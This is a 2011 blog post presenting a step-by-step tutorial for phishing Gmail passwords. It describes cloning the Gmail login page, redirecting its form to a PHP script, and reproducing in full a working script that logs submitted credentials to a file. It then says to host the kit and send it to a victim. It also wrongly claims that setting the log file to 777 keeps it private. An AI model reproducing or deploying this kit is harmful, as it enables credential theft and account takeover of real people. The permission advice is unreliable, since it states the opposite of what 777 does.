Thursday 1 September 2011

Hack Gmail Account | Phishing

In this following tutorial to phishing I‘ll demonstrate how to hack Gmail account password by phishing. Since we already covered how to hack Facebook account using phishing I consider this as second tutorial to phishing. First of all we will create a fake login page, to create it open www.gmail.com in your web browser, click on file then save as and select file name “Gmail” and save as type “Web page Complete”. After above process you’ll have a file named Gmail.htm and a folder named Gmail_files in folder in which you’ll save web page. Now open Gmail.htm in notepad, find for action word and locate following string,
action="https://www.google.com/accounts/ServiceLoginAuth"

Once located change action string by phish.php, so that above string should appear as following,

action="phish.php"

Now step number two is to create phish.php file. Open notepad and copy following code in it,

<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it as phish.php, now create an empty password log file log.txt. Now sign up for a free webhosting service which supports php from http://www.100best-free-web-space.com/. Now upload Gmail.htm file, php file, password log file and Gmail_files folder to that web host. Change permission of log.txt file to777 from settings so that no one else than you can see or edit it.

Now you have to vector this phished site to your victim to hack his/her password. We will cover vectoring phished pages and countermeasures to phishing after few more tutorials on phishing. Till then have a nice time, thanks for reading and keep visiting.

No comments:

Post a Comment